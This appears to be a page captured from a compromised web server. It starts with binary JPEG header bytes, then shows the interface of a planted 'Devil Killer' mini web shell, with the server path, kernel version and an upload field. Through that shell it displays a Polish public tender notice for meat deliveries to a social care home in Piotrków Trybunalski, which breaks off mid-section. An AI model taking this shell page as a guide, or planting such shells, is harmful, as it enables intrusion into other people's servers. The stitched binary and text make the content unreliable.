JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240529/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240529/0034548801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywna dostawa produktów mięsnych i wędliniarskich dla Domu Pomocy Społecznej w Piotrkowie Trybunalskim </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">DOM POMOCY SPOŁECZNEJ W PIOTRKOWIE TRYBUNALSKIM</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">DPS</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001026591</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Franciszka Żwirki 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Piotrków Trybunalski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@dompomocypiotrkow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.dompomocy.piotrkow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Pomoc społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywna dostawa produktów mięsnych i wędliniarskich dla Domu Pomocy Społecznej w Piotrkowie Trybunalskim </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-51fea2fc-1dab-11ef-a7c1-72acb4a2af8f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00345488</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00538206/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Sukcesywna dostawa produktów mięsnych i wędliniarskich dla Domu Pomocy Społecznejw Piotrkowie Trybunalskim</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-51fea2fc-1dab-11ef-a7c1-72acb4a2af8f <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcą/Wykonawcami odbywa się drogą elektroniczną przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl/pl/ oraz poczty elektronicznej sekretariat@dompomocypiotrkow.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje odnoszące się do zakładania kont podmiotów oraz zasad i warunków korzystania z platformy e — Zamówienia określa „Regulamin Platformy e-Zamówienia” — dostępny na stronie internetowej https://ezamowienia.gov.pl/pl/ w zakładce „Centrum Pomocy”.<br/>3. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej(cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>4. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB.<br/>5. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust 1 ustawy, podmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazanych w postępowaniu, przyjmuje się datę ich przekazania odpowiednio na platformie e — zamówienia lub pocztę elektroniczną Zamawiającego.<br/>6. W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż złożenie oferty przez Wykonawcę i załączników do oferty)odbywa się za pomocą poczty elektronicznej.<br/>7. Dokumenty elektroniczne składane przez Wykonawcę za pośrednictwem poczty elektronicznej sekretariat@dompomocypiotrkow.pl<br/>8. Preferowany sposób komunikacji z wykonawcami:<br/>a. e mail : sekretariat@dompomocypiotrkow.pl <br/>9. Informacje o sposobie komunikowania się zamawiającego z wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej w przypadku zaistnienia jednej z sytuacji określonych w art. 65 ust. 1, art. 66 i art. 69 – nie dotyczy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">EA.2311.2.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia:<br/>„Dostawa produktów mięsnych i wędliniarskich dla Domu Pomocy Społecznej w Piotrkowie<br/>Trybunalskim”<br/>Kod CPV - 15100000-9 Produkty zwierzęce, mięso i produkty mięsne<br/>1. Przedmiotem zamówienia jest dostawa produktów mięsnych i wędliniarskich dla Domu<br/>Pomocy Społecznej w Piotrkowie Trybunalskim w okresie od 01 lipca 2024 roku do 30<br/>września 2024 roku, które zostały wyszczególnione i określone zarówno jakościowo,<br/>jak i ilościowo poniżej:<br/>1) Wymagania wspólne dla mięs:<br/>a) czystość - mięso czyste bez śladów zanieczyszczeń ciałami obcymi, dobrze wykrwawione,<br/>b) konsystencja - jędrna, elastyczna, odkształcająca się,<br/>c) smak i zapach swoisty, charakterystyczny dla danego rodzaju mięsa, bez oznak zaparzenia<br/>lub zepsucia,<br/>d) barwa - od jasnoczerwonej do ciemnoczerwonej,<br/>e) mięso oznakowane przez lekarza weterynarii - zdatne do spożycia, ze sztuk zdrowych,<br/>niepochodzących od knurów, loch,<br/>f) mięso świeże, niemrożone,<br/>g) mięso mielone - świeżo zmielone mięso z szynki wieprzowej.<br/>2) Wymagania wspólne dla wędlin:<br/>h) klasa I, świeże, wystudzone, powierzchnia sucha, osłonka ściśle przylegająca, równomiernie<br/>pomarszczona, bez pęknięć i wycieków farszu,<br/>i) skład farszu z mięsa wieprzowego, wieprzowo-wołowego, drobiowego, przypraw,<br/>j) ścisła konsystencja umożliwiająca porcjowanie,<br/>k) smak, zapach i konsystencja właściwa dla danego rodzaju wędliny.<br/>Zamawiający wymaga, aby przedmiot dostawy posiadał oznakowanie tj. nazwa, data<br/>produkcji, termin przydatności z minimum:<br/>a) 4-dniowym okresem przydatności do spożycia dla mięsa świeżego od dnia dostarczenia<br/>przedmiotu zamówienia,<br/>b) 14-dniowym okresem przydatności do spożycia dla wędlin vacum od dnia dostarczenia<br/>przedmiotu zamówienia.<br/>3) Produkty spożywcze objęte dostawą powinny spełniać wymogi sanitarno–epidemiologiczne<br/>i zasady systemu HACCP oraz GMP/GHP, GAP w zakładach żywienia zbiorowego między<br/>innymi:<br/>a) Posiadać odpowiednie specyfikacje jakościowe lub atesty,<br/>b) Posiadać odpowiednie oznakowanie, czyli datę minimalnej trwałości i termin<br/>przydatności do spożycia,<br/>c) Posiadać odpowiednią temperaturę podczas transportu i warunki sanitarne pojazdu.<br/>4) Wykonawca zobowiązuje się do dostarczenia przedmiotu zamówienia posiadającego<br/>odpowiednie świadectwa oraz spełniającego obowiązujące wymagania i normy jakościowe.<br/>Dostarczony asortyment winien być dobrej jakości w gatunku pierwszym oraz spełniać<br/>wymagania wynikające z obowiązujących przepisów prawa, w szczególności określone:<br/>a) W ustawie z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia (Dz. U. z<br/>2023 r. poz. 1448).<br/>b) W ustawie z dnia 21 grudnia 2000r. o jakości handlowej artykułów rolno – spożywczych<br/>(Dz. U. z 2023 r. poz. 1980).<br/>c) W ustawie z dnia 16 grudnia 2005r. o produktach pochodzenia zwierzęcego (Dz. U. z<br/>2023 r. poz. 872).<br/>d) W Rozporządzeniu (WE) 852/2004 Parlamentu Europejskiego i Rady z dnia 29 kwietnia<br/>2004 r. w sprawie higieny środków spożywczych (Dz. U. L 139 z 30.4.2004 z późn.<br/>zm.).<br/>e) W Rozporządzeniu Ministra Rolnictwa i Rozwoju Wsi z dnia 23 grudnia 2014r. w<br/>sprawie znakowania poszczególnych rodzajów środków spożywczych (Dz. U. z 2015<br/>poz 29 z późn. zm.).<br/>5) Należy zaoferować wszystkie pozycje asortymentowe. Nie wypełnienie którejkolwiek<br/>pozycji oznacza odrzucenie oferty.<br/>6) Wskazane w tabeli ilości są wielkościami planowanymi przyjętymi do celów porównania<br/>ofert i wyboru najkorzystniejszej oferty. Są to ilości szacunkowe. Zamawiający nie jest<br/>w stanie przewidzieć ilości dostaw w okresie trwania umowy. Zamawiający zastrzega sobie<br/>prawo do dokonywania zmian ilościowych tj. zmniejszenia lub zwiększenia poszczególnych<br/>pozycji przedmiotu zamówienia. Rzeczywiste ilości będą wynikać wyłącznie z bieżących<br/>potrzeb Zamawiającego.<br/>7) Zamawiający zastrzega sobie prawo do zwiększenia ilości podanych w poszczególnych<br/>Formularzach asortymentowo - cenowych, na które będzie większe od szacowanego<br/>zapotrzebowanie, przy zachowaniu cen jednostkowych określonych przez Wykonawcę<br/>w ofercie. Powyższe nie może stanowić podstawy do wnoszenia przez Wykonawcę roszczeń<br/>o zakup pozostałej ilości produktów czy odszkodowania za ich niezamówienie.<br/>Strona 6 z 7<br/>2. Pozostałe warunki opisu przedmiotu zamówienia<br/>1) dostarczenia przedmiotu zamówienia do Zamawiającego na własne ryzyko i koszt,<br/>2) dostarczenia przedmiotu zamówienia specjalistycznym transportem własnym lub innego<br/>przewoźnika, spełniającym obowiązujące wymogi prawne, zgodnie z obowiązującymi<br/>przepisami i normami; środek transportu musi spełniać obowiązujące wymogi sanitarne i<br/>HACCP do przewozu produktów spożywczych, w odpowiednich opakowaniach (zamknięte,<br/>nieuszkodzone), pojemniki plastikowe, z pokrywami, czyste, bez obcych zapachów, powinny<br/>być przeznaczone tylko do jednego asortymentu i posiadać atesty do kontaktu z żywnością,<br/>3) zabezpieczenia należycie przedmiotu zamówienia na czas przewozu i ponoszenia całkowitej<br/>odpowiedzialności za dostawę i jakość dostarczanego towaru,<br/>4) ponoszenia odpowiedzialności za braki i wady powstałe w czasie transportu przedmiotu<br/>zamówienia oraz ponoszenia wynikających z tego tytułu wszelkich skutków prawnych,<br/>5) posiadania zgodnie z art. 61 i 62 ust. 1 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie<br/>żywności i żywienia (Dz. U. z 2023 r. poz. 1448) wpisu do rejestru zakładów podlegających<br/>urzędowej kontroli organów Państwowej Inspekcji Sanitarnej.<br/>6) Cena oferty musi obejmować wszelkie koszty związane z realizacją przedmiotu dostawy tj.:<br/>a) dostawę wraz z dowozem,<br/>b) wniesienie do miejsca wskazanego w siedzibie Zamawiającego,<br/>c) opłaty i podatki, w tym podatek od towarów i usług (VAT),<br/>d) inne, nie wymienione powyżej koszty, zapewniające prawidłową realizację zamówienia.<br/>7) Wykonawcy, z którym Zamawiający podpisze umowę, nie przysługuje roszczenie o realizację<br/>dostawy w ww. zakresie. Zamawiający zastrzega sobie prawo zamówienia w okresie trwania<br/>umowy dowolnej ilości danego asortymentu.<br/>8) Zamawiany towar ma być dostarczany do Zamawiającego w pojemnikach Wykonawcy.<br/>9) Transport odbywał się będzie na koszt Wykonawcy wraz z dostarczeniem towaru do siedziby<br/>Zamawiającego zgodnie ze sposobem dostawy określonym przez Wykonawcę w Formularzu<br/>Ofertowym (kryterium w SWZ oprócz ceny).<br/>10) Przedmiot zamówienia będzie dostarczany we wtorki i w piątki w godz. 07:30 – 09:30.<br/>11) W szczególnych przypadkach zamówienie może być zrealizowane w innym dniu roboczym po<br/>wcześniejszym uzgodnieniu terminu z Wykonawcą (np.: dzień świąteczny wypadający we<br/>wtorek lub piątek, konieczność uzupełnienia dostawy z przyczyn leżących po stronie<br/>Zamawiającego).<br/>12) Dostawy odbywać się będą środkiem transportu przystosowanym do przewozu artykułów<br/>spożywczych, zgodnie z przepisami sanitarno-epidemiologicznymi i innymi obowiązującymi<br/>przepisami, w tym zakresie.<br/>13) Zamawiający zastrzega sobie prawo do sprawdzenia dostawy pod względem ilościowym<br/>i jakościowym na miejscu w obecności Wykonawcy (pracownik, kierowca). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-07-01 do 2024-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za ofertę najkorzystniejszą zostanie uznana oferta, spośród ofert zakwalifikowanych jako nieodrzucone, zawierająca najkorzystniejszy bilans punktów w kryteriach:<br/>Cena ofertowa netto – C, najniższa cena - 85%.<br/>Sposób dokonania dostawy do siedziby Zamawiającego SD - 5%.<br/>Czas wymiany wadliwego towaru (jakość/ilość), licząc od godziny dostawy do siedziby Zamawiającego CW - 10%.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">85</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Sposób dokonania dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wymiany wadliwego towaru (jakość/ilość) licząc od godziny dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają określone przez zamawiającego warunki udziału w postępowaniu.<br/>2. Nazwa i opis warunków udziału w postępowaniu:<br/>1) zdolność do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie. <br/>2) uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacja ekonomiczna lub finansowa:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolność techniczna lub zawodowa:<br/>Warunek dotyczący zdolności technicznej lub zawodowej zamawiający uzna za spełniony, jeśli wykonawca:<br/>a) wykonał należycie co najmniej trzy zamówienia (wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie), odpowiadające rodzajem przedmiotowi niniejszego zamówienia o wartości każdej nie mniejszej niż wartość brutto zaoferowana w niniejszym postępowaniu – wg załącznika nr 8 do SWZ. <br/>b) załączy dowody określające czy usługi / dostawy te zostały wykonane należycie,<br/>Dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy, w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">3. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu polegać na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych:<br/>1) w odniesieniu do warunków dotyczących doświadczenia, wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają świadczenie do realizacji którego te zdolności są wymagane,<br/>2) wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów,<br/>3) wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby, zgodnie z warunkami określonymi w ust. 2 pkt 4 lit a ,b<br/>4) jeżeli zdolności techniczne lub zawodowe podmiotu udostępniającego zasoby nie potwierdzają spełniania przez wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, zamawiający żąda, aby wykonawca w terminie określonym przez zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu,<br/>5) wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby.<br/>6) Oceniając zdolność techniczną lub zawodową, zamawiający może, na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: 